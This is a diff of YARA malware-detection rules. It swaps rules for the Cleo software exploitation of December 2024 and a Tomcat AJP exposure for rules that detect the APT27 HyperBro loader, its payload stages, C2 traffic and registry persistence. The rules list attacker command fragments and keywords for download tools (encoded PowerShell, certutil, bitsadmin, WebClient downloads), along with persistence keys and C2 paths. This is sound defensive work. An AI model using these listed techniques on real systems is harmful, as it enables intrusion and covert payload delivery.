+		$s2 = "http://%s%s%s" fullword
+		$s3 = "1.9.1.17" fullword wide
+		$s4 = "(C)Firefox and Mozilla Developers, according to the MPL 1.1/GPL 2.0/LGPL" wide
 
 	condition:
-		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_XML_Indicators_Dec24 : FILE
+
+rule SIGNATURE_BASE_APT_RU_APT27_Hyperbro_Vftrace_Loader_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "622633af-aa7a-5bf9-a59c-6590535d86a4"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L91-L109"
+		description = "Yara rule to detect first Hyperbro Loader Stage, often called vftrace.dll. Detects decoding function."
+		author = "Bundesamt fuer Verfassungsschutz (modified by Florian Roth)"
+		id = "b049e163-2694-5fb9-a3a3-98cc77bcd0ca"
+		date = "2022-01-14"
+		modified = "2023-12-05"
+		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21c11c3e0c0ffea89e24b9c002b6112a46b4dc7c2c4f1f5dc9803758a68efc36"
-		score = 70
+		logic_hash = "d8785ea937891636bea5ed8128de44fa6084a1a48800c1586739c5ca9e4c43bd"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		sharing = "TLP:WHITE"
+		hash1 = "333B52C2CFAC56B86EE9D54AEF4F0FF4144528917BC1AA1FE1613EFC2318339A"
 
 	strings:
-		$x1 = "<Host alias=\"60282967-dc91-40ef-a34c-38e992509c2c\" application=\"\" " ascii
-		$s1 = "<Commands>SYSTEM cmd.exe /c " ascii
-		$a1 = "<Action actiontype=\"Commands\" " ascii
+		$decoder_routine = { 8A ?? 41 10 00 00 8B ?? 28 ?? ?? 4? 3B ?? 72 ?? }
 
 	condition:
-		filesize < 50KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and $decoder_routine and pe.exports ( "D_C_Support_SetD_File" )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_1 : FILE
-{
-	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "b30ca09f-b84c-5de8-9bf7-9f3269f32c1f"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L112-L146"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9be15aec57fdde62815ee04daa5616940ab7949784d382a4825dce9f1e28568"
-		score = 70
-		quality = 83
-		tags = "FILE"
-		hash1 = "b103f708e85416fc6d7af9605da4b57b3abe42fb9c6c9ec0f539b4c877580bd2"
-
-	strings:
-		$sa1 = "<Action actiontype=\"Commands\"" ascii
-		$sa2 = "<?xml version=" ascii
-		$sa3 = "<Runninglocalrequired>" ascii
-		$sa4 = "<Autostartup>" ascii
-		$sb1 = "[System.Net.WebRequest]::create" ascii
-		$sb2 = "Invoke-RestMethod" ascii
-		$sb3 = "Invoke-WebRequest" ascii
-		$sb4 = "iwr " ascii
-		$sb5 = "Net.WebClient" ascii
-		$sb6 = "Resume-BitsTransfer" ascii
-		$sb7 = "Start-BitsTransfer" ascii
-		$sb8 = "wget " ascii
-		$sb9 = "WinHttp.WinHttpRequest" ascii
-		$sb10 = ".DownloadFile(" ascii
-		$sb11 = ".DownloadString(" ascii
-		$sb12 = "Bypass" nocase ascii
-		$sb13 = "-EncodedCommand" ascii
-		$sb14 = "-windowstyle hidden" ascii
-		$sb15 = " -enc " ascii
 
-	condition:
-		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
-}
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_2 : FILE
+rule SIGNATURE_BASE_APT_CN_APT27_Compromised_Certficate_Jan22_1
 {
 	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "a71c71f3-d36f-5c27-b150-e678bccf2dba"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L148-L183"
+		description = "Detects compromised certifcates used by APT27 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f2f015af-219d-51ab-9529-01687a879ebb"
+		date = "2022-01-29"
+		modified = "2023-12-05"
+		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L21-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60e53c8d99fde8c48bff67408605aa69c3c1fe3040ba4f9d2080980df970aa93"
-		score = 70
+		logic_hash = "94a40d55936fc341eaba5e1accc8bfe3a401114298e7a3cc4d5c64af36eadf9e"
+		score = 80
 		quality = 85
-		tags = "FILE"
-
-	strings:
-		$sa1 = "<Action actiontype=\"Commands\"" ascii
-		$sa2 = "<?xml version=" ascii
-		$sa3 = "<Runninglocalrequired>" ascii
-		$sa4 = "<Autostartup>" ascii
-		$sb1 = "wscript" ascii
-		$sb2 = "cscript" ascii
-		$sb3 = "mshta" ascii
-		$sb4 = "certutil" ascii
-		$sb5 = "pwsh" ascii
-		$sb6 = "curl" ascii
-		$sb7 = "msiexec" ascii
-		$sb8 = "taskkill" ascii
-		$sb9 = "regsvr32" ascii
-		$sb10 = "rundll32" ascii
-		$sb11 = "bitsadmin" ascii
-		$sb12 = "whoami" ascii
-		$sb13 = "bcdedit" ascii
-		$sb14 = "systeminfo" ascii
-		$sb15 = "reg " ascii
-		$sb16 = "schtasks" ascii
+		tags = ""
 
 	condition:
-		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
+		for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and pe.signatures [ i ] . serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6" )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_PS1_Indicators_Dec24 : SCRIPT
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Decrypted_Stage2 : FILE
 {
 	meta:
-		description = "Detects encoded and decoded PowerShell loader used during Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "491cda57-0ad0-5ddc-90cb-48411eef2f2e"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L185-L202"
+		description = "HyperBro Stage 2 and compressed Stage 3 detection"
+		author = "Moritz Oettle"
+		id = "039e5d41-eadb-5c53-82cd-20ffd4105326"
+		date = "2022-02-07"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L35-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87dcd0aa3c16d8948514b1d8589d38c6cc73bf7e6262f4517659cead16fedd3d"
+		logic_hash = "6eb56c4a92e89977e536ccc3c70170062aca072c6981b40aeea184ea2ca461a6"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
-
-	strings:
-		$xe1 = "Start-Process -WindowStyle Hidden -FilePath jre\\bin\\java.exe" base64 ascii wide
-		$xe2 = "$f=\"cleo." base64 ascii wide
-		$xe3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " base64 ascii wide
-		$x1 = "$f=\"cleo." ascii wide
-		$x2 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
-
-	condition:
-		1 of them
-}
-rule SIGNATURE_BASE_SUSP_EXPL_JAR_Indicators_Dec24 : FILE
-{
-	meta:
-		description = "Detects characteristics of JAR files used during Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "4e8f6aa8-9efd-5fcf-b795-5042d4ba1708"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L204-L222"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8b87e7000ab5d9759f55660a085bf0f3dddb46ad1ea411cbbabce1000105ee9e"
-		score = 70
-		quality = 85
 		tags = "FILE"
+		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
 
 	strings:
-		$s1 = "TLS v3 " ascii
-		$s2 = "java/util/Base64$Decoder" ascii
-		$s3 = "AES/CBC/NoPadding" ascii
-		$s4 = "getenv" ascii
-		$s5 = "ava/util/zip/ZipInputStream" ascii
+		$lznt1_compressed_pe_header_small = { FC B9 00 4D 5A 90 }
+		$lznt1_compressed_pe_header_large_1 = { FC B9 00 4D 5A 90 00 03 00 00 00 82 04 00 30 FF FF 00 }
+		$lznt1_compressed_pe_header_large_2 = { 00 b8 00 38 0d 01 00 40 04 38 19 00 10 01 00 00 }
+		$lznt1_compressed_pe_header_large_3 = { 00 0e 1f ba 0e 00 b4 09 cd 00 21 b8 01 4c cd 21 }
+		$lznt1_compressed_pe_header_large_4 = { 54 68 00 69 73 20 70 72 6f 67 72 00 61 6d 20 63 }
+		$lznt1_compressed_pe_header_large_5 = { 61 6e 6e 6f 00 74 20 62 65 20 72 75 6e 00 20 69 }
+		$lznt1_compressed_pe_header_large_6 = { 6e 20 44 4f 53 20 00 6d 6f 64 65 2e 0d 0d 0a 02 }
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and all of them
+		filesize < 200KB and ( $lznt1_compressed_pe_header_small at 0x9ce ) or ( all of ( $lznt1_compressed_pe_header_large_* ) )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_1_1 : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3 : FILE
 {
 	meta:
-		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - files Cli, ScSlot, Slot, SrvSlot"
-		author = "Florian Roth"
-		id = "2940ddad-3dba-594a-9111-e4741d6ff39b"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L224-L245"
+		description = "HyperBro Stage 3 detection - also tested in memory"
+		author = "Markus Poelloth"
+		id = "b4002777-f129-5177-a8f1-690012a207fa"
+		date = "2022-02-07"
+		modified = "2023-01-07"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L59-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85600e9310e502b3b2135f2f3cf698ae54fe362047cdf9d378dcc107e0c2fa18"
-		score = 75
+		logic_hash = "49c1e70d63d93244b4b44525f2b30c05512b5f3a30d6d7c43c9366a95c84e79b"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "0c57b317b572d071afd8ccdb844dd6f117e20f818c6031d7ba8adcbd32be0617"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
 
 	strings:
-		$a1 = "java/lang/StringBuffer"
-		$x1 = "Start-Sleep 3;del " ascii
-		$x2 = "sleep 3;rm -f '" ascii
-		$x3 = "powershell -Noninteractive -EncodedCommand " ascii
-		$x4 = "runDelFileCmd" ascii fullword
+		$s1 = "\\cmd.exe /A" wide
+		$s2 = "vftrace.dll" fullword wide
+		$s3 = "msmpeng.exe" fullword wide
+		$s4 = "\\\\.\\pipe\\testpipe" fullword wide
+		$s5 = "thumb.dat" fullword wide
+		$g1 = "%s\\%d.exe" fullword wide
+		$g2 = "https://%s:%d/api/v2/ajax" fullword wide
+		$g3 = " -k networkservice" fullword wide
+		$g4 = " -k localservice" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 50KB and $a1 and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( ( 4 of ( $s* ) ) or ( 4 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_2 : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_C2
 {
 	meta:
-		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - file Proc"
-		author = "Florian Roth"
-		id = "bd575454-7fd0-566d-94e5-ec1368675108"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L247-L265"
+		description = "HyperBro Stage 3 C2 path and user agent detection - also tested in memory"
+		author = "Marc Stroebel"
+		id = "d1fe03b9-440c-5127-9572-dddcd5c9966b"
+		date = "2022-02-07"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L86-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2bb5eace09b832bf3ce296484f473c9c56f97b881ea17838408be6000cc6fcb1"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "1ba95af21bac45db43ebf02f87ecedde802c7de4d472f33e74ee0a5b5015a726"
+		logic_hash = "676df1eaa782c6b876df138a0ddddc3c63e277b84d4414b044314ee219674420"
+		score = 50
+		quality = 81
+		tags = ""
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
 
 	strings:
-		$s1 = "Timeout getting pipe-data" ascii fullword
-		$s2 = "Ftprootpath" ascii fullword
-		$s3 = "Rest cmd=" ascii fullword
-		$s4 = "writeToProc" ascii fullword
+		$s1 = "api/v2/ajax" ascii wide nocase
+		$s2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 30KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_3 : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_Persistence
 {
 	meta:
-		description = "Detects characteristics of JAR files used during Cleo software exploitation"
-		author = "X__Junior"
-		id = "5c227bb9-0731-5955-a758-6fe86ecc2d86"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L267-L286"
+		description = "HyperBro Stage 3 registry keys for persistence"
+		author = "Marko Dorfhuber"
+		id = "2bb1d28b-5fc4-5f0b-b546-c8b8192b0d48"
+		date = "2022-02-07"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64a6194110d4eb359cc3f15137cf752d598f2f0a52ac181fcaa358bf40072f54"
+		logic_hash = "db4b7be2bafe29b5e7c81a90e17a660cf73cff1c2e8edd04a9421daba09e3e0e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
 
 	strings:
-		$a1 = "java/lang/String" ascii
-		$s1 = "#lsz#" ascii
-		$s2 = "#dbg#" ascii
-		$s3 = "#ll#" ascii
-		$s4 = "SvZipDataOverflow=%d OpNotConf=" ascii
+		$ = "SOFTWARE\\WOW6432Node\\Microsoft\\config_" ascii
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windefenders" ascii
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and 3 of ( $s* ) and $a1
+		1 of them
 }
-rule SIGNATURE_BASE_VUL_Tomcat_Catalina_CVE_2020_1938 : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Encrypted_Stage2 : FILE
 {
 	meta:
-		description = "Detects a possibly active and vulnerable Tomcat configuration that includes an accessible and unprotected AJP connector (you can ignore backup files or files that are not actively used)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d23af7ce-eb5d-50aa-be02-b4bf858641c2"
-		date = "2020-02-28"
+		description = "HyperBro Encrypted Stage 2 detection. Looks for all possible one byte shifts of the lznt1 compressed PE header"
+		author = "Moritz Oettle"
+		id = "fa4fe057-4c3f-5785-a8d3-588398360996"
+		date = "2022-02-07"
 		modified = "2023-12-05"
-		reference = "https://www.chaitin.cn/en/ghostcat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2020_1938.yar#L2-L23"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt27_hyperbro.yar#L120-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "902b469c8a31add2254e8d5ade6bc22f1bc0a2b10ea70f3131f0640f2900e667"
-		score = 50
-		quality = 85
+		logic_hash = "c3b07bdb19730fc9c8cca8aa7581a32eb80e3dbc5c4d366fbb2f9966081c1a21"
+		score = 75
+		quality = 60
 		tags = "FILE"
+		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
 
 	strings:
-		$h1 = "<?xml "
-		$a1 = "<Service name=\"Catalina\">" ascii
-		$v1 = "<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"/>" ascii
-		$fp1 = "<!--<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"" ascii
-		$fp2 = " secret=\"" ascii
-		$fp3 = " requiredSecret=\"" ascii
+		$encrypted_pe_header_shift_0 = { fc b9 00 4d 5a 90 00 03 00 00 00 82 04 00 30 ff ff 00 }
+		$encrypted_pe_header_shift_1 = { fd ba 01 4e 5b 91 01 04 01 01 01 83 05 01 31 00 00 01 }
+		$encrypted_pe_header_shift_2 = { fe bb 02 4f 5c 92 02 05 02 02 02 84 06 02 32 01 01 02 }
+		$encrypted_pe_header_shift_3 = { ff bc 03 50 5d 93 03 06 03 03 03 85 07 03 33 02 02 03 }
+		$encrypted_pe_header_shift_4 = { 00 bd 04 51 5e 94 04 07 04 04 04 86 08 04 34 03 03 04 }
+		$encrypted_pe_header_shift_5 = { 01 be 05 52 5f 95 05 08 05 05 05 87 09 05 35 04 04 05 }
+		$encrypted_pe_header_shift_6 = { 02 bf 06 53 60 96 06 09 06 06 06 88 0a 06 36 05 05 06 }
+		$encrypted_pe_header_shift_7 = { 03 c0 07 54 61 97 07 0a 07 07 07 89 0b 07 37 06 06 07 }
+		$encrypted_pe_header_shift_8 = { 04 c1 08 55 62 98 08 0b 08 08 08 8a 0c 08 38 07 07 08 }
+		$encrypted_pe_header_shift_9 = { 05 c2 09 56 63 99 09 0c 09 09 09 8b 0d 09 39 08 08 09 }
+		$encrypted_pe_header_shift_10 = { 06 c3 0a 57 64 9a 0a 0d 0a 0a 0a 8c 0e 0a 3a 09 09 0a }
+		$encrypted_pe_header_shift_11 = { 07 c4 0b 58 65 9b 0b 0e 0b 0b 0b 8d 0f 0b 3b 0a 0a 0b }
+		$encrypted_pe_header_shift_12 = { 08 c5 0c 59 66 9c 0c 0f 0c 0c 0c 8e 10 0c 3c 0b 0b 0c }
+		$encrypted_pe_header_shift_13 = { 09 c6 0d 5a 67 9d 0d 10 0d 0d 0d 8f 11 0d 3d 0c 0c 0d }
+		$encrypted_pe_header_shift_14 = { 0a c7 0e 5b 68 9e 0e 11 0e 0e 0e 90 12 0e 3e 0d 0d 0e }
+		$encrypted_pe_header_shift_15 = { 0b c8 0f 5c 69 9f 0f 12 0f 0f 0f 91 13 0f 3f 0e 0e 0f }
+		$encrypted_pe_header_shift_16 = { 0c c9 10 5d 6a a0 10 13 10 10 10 92 14 10 40 0f 0f 10 }
+		$encrypted_pe_header_shift_17 = { 0d ca 11 5e 6b a1 11 14 11 11 11 93 15 11 41 10 10 11 }
+		$encrypted_pe_header_shift_18 = { 0e cb 12 5f 6c a2 12 15 12 12 12 94 16 12 42 11 11 12 }
+		$encrypted_pe_header_shift_19 = { 0f cc 13 60 6d a3 13 16 13 13 13 95 17 13 43 12 12 13 }
+		$encrypted_pe_header_shift_20 = { 10 cd 14 61 6e a4 14 17 14 14 14 96 18 14 44 13 13 14 }
+		$encrypted_pe_header_shift_21 = { 11 ce 15 62 6f a5 15 18 15 15 15 97 19 15 45 14 14 15 }
+		$encrypted_pe_header_shift_22 = { 12 cf 16 63 70 a6 16 19 16 16 16 98 1a 16 46 15 15 16 }
+		$encrypted_pe_header_shift_23 = { 13 d0 17 64 71 a7 17 1a 17 17 17 99 1b 17 47 16 16 17 }
+		$encrypted_pe_header_shift_24 = { 14 d1 18 65 72 a8 18 1b 18 18 18 9a 1c 18 48 17 17 18 }
+		$encrypted_pe_header_shift_25 = { 15 d2 19 66 73 a9 19 1c 19 19 19 9b 1d 19 49 18 18 19 }
+		$encrypted_pe_header_shift_26 = { 16 d3 1a 67 74 aa 1a 1d 1a 1a 1a 9c 1e 1a 4a 19 19 1a }
+		$encrypted_pe_header_shift_27 = { 17 d4 1b 68 75 ab 1b 1e 1b 1b 1b 9d 1f 1b 4b 1a 1a 1b }
+		$encrypted_pe_header_shift_28 = { 18 d5 1c 69 76 ac 1c 1f 1c 1c 1c 9e 20 1c 4c 1b 1b 1c }
+		$encrypted_pe_header_shift_29 = { 19 d6 1d 6a 77 ad 1d 20 1d 1d 1d 9f 21 1d 4d 1c 1c 1d }
+		$encrypted_pe_header_shift_30 = { 1a d7 1e 6b 78 ae 1e 21 1e 1e 1e a0 22 1e 4e 1d 1d 1e }
+		$encrypted_pe_header_shift_31 = { 1b d8 1f 6c 79 af 1f 22 1f 1f 1f a1 23 1f 4f 1e 1e 1f }
+		$encrypted_pe_header_shift_32 = { 1c d9 20 6d 7a b0 20 23 20 20 20 a2 24 20 50 1f 1f 20 }
+		$encrypted_pe_header_shift_33 = { 1d da 21 6e 7b b1 21 24 21 21 21 a3 25 21 51 20 20 21 }
+		$encrypted_pe_header_shift_34 = { 1e db 22 6f 7c b2 22 25 22 22 22 a4 26 22 52 21 21 22 }
+		$encrypted_pe_header_shift_35 = { 1f dc 23 70 7d b3 23 26 23 23 23 a5 27 23 53 22 22 23 }
+		$encrypted_pe_header_shift_36 = { 20 dd 24 71 7e b4 24 27 24 24 24 a6 28 24 54 23 23 24 }
+		$encrypted_pe_header_shift_37 = { 21 de 25 72 7f b5 25 28 25 25 25 a7 29 25 55 24 24 25 }
+		$encrypted_pe_header_shift_38 = { 22 df 26 73 80 b6 26 29 26 26 26 a8 2a 26 56 25 25 26 }
+		$encrypted_pe_header_shift_39 = { 23 e0 27 74 81 b7 27 2a 27 27 27 a9 2b 27 57 26 26 27 }
+		$encrypted_pe_header_shift_40 = { 24 e1 28 75 82 b8 28 2b 28 28 28 aa 2c 28 58 27 27 28 }
+		$encrypted_pe_header_shift_41 = { 25 e2 29 76 83 b9 29 2c 29 29 29 ab 2d 29 59 28 28 29 }
+		$encrypted_pe_header_shift_42 = { 26 e3 2a 77 84 ba 2a 2d 2a 2a 2a ac 2e 2a 5a 29 29 2a }
+		$encrypted_pe_header_shift_43 = { 27 e4 2b 78 85 bb 2b 2e 2b 2b 2b ad 2f 2b 5b 2a 2a 2b }
+		$encrypted_pe_header_shift_44 = { 28 e5 2c 79 86 bc 2c 2f 2c 2c 2c ae 30 2c 5c 2b 2b 2c }
+		$encrypted_pe_header_shift_45 = { 29 e6 2d 7a 87 bd 2d 30 2d 2d 2d af 31 2d 5d 2c 2c 2d }
+		$encrypted_pe_header_shift_46 = { 2a e7 2e 7b 88 be 2e 31 2e 2e 2e b0 32 2e 5e 2d 2d 2e }
+		$encrypted_pe_header_shift_47 = { 2b e8 2f 7c 89 bf 2f 32 2f 2f 2f b1 33 2f 5f 2e 2e 2f }
+		$encrypted_pe_header_shift_48 = { 2c e9 30 7d 8a c0 30 33 30 30 30 b2 34 30 60 2f 2f 30 }
+		$encrypted_pe_header_shift_49 = { 2d ea 31 7e 8b c1 31 34 31 31 31 b3 35 31 61 30 30 31 }
+		$encrypted_pe_header_shift_50 = { 2e eb 32 7f 8c c2 32 35 32 32 32 b4 36 32 62 31 31 32 }
+		$encrypted_pe_header_shift_51 = { 2f ec 33 80 8d c3 33 36 33 33 33 b5 37 33 63 32 32 33 }
+		$encrypted_pe_header_shift_52 = { 30 ed 34 81 8e c4 34 37 34 34 34 b6 38 34 64 33 33 34 }
+		$encrypted_pe_header_shift_53 = { 31 ee 35 82 8f c5 35 38 35 35 35 b7 39 35 65 34 34 35 }
+		$encrypted_pe_header_shift_54 = { 32 ef 36 83 90 c6 36 39 36 36 36 b8 3a 36 66 35 35 36 }
+		$encrypted_pe_header_shift_55 = { 33 f0 37 84 91 c7 37 3a 37 37 37 b9 3b 37 67 36 36 37 }
+		$encrypted_pe_header_shift_56 = { 34 f1 38 85 92 c8 38 3b 38 38 38 ba 3c 38 68 37 37 38 }
+		$encrypted_pe_header_shift_57 = { 35 f2 39 86 93 c9 39 3c 39 39 39 bb 3d 39 69 38 38 39 }
+		$encrypted_pe_header_shift_58 = { 36 f3 3a 87 94 ca 3a 3d 3a 3a 3a bc 3e 3a 6a 39 39 3a }
+		$encrypted_pe_header_shift_59 = { 37 f4 3b 88 95 cb 3b 3e 3b 3b 3b bd 3f 3b 6b 3a 3a 3b }
+		$encrypted_pe_header_shift_60 = { 38 f5 3c 89 96 cc 3c 3f 3c 3c 3c be 40 3c 6c 3b 3b 3c }
+		$encrypted_pe_header_shift_61 = { 39 f6 3d 8a 97 cd 3d 40 3d 3d 3d bf 41 3d 6d 3c 3c 3d }
+		$encrypted_pe_header_shift_62 = { 3a f7 3e 8b 98 ce 3e 41 3e 3e 3e c0 42 3e 6e 3d 3d 3e }
+		$encrypted_pe_header_shift_63 = { 3b f8 3f 8c 99 cf 3f 42 3f 3f 3f c1 43 3f 6f 3e 3e 3f }
+		$encrypted_pe_header_shift_64 = { 3c f9 40 8d 9a d0 40 43 40 40 40 c2 44 40 70 3f 3f 40 }
+		$encrypted_pe_header_shift_65 = { 3d fa 41 8e 9b d1 41 44 41 41 41 c3 45 41 71 40 40 41 }
+		$encrypted_pe_header_shift_66 = { 3e fb 42 8f 9c d2 42 45 42 42 42 c4 46 42 72 41 41 42 }
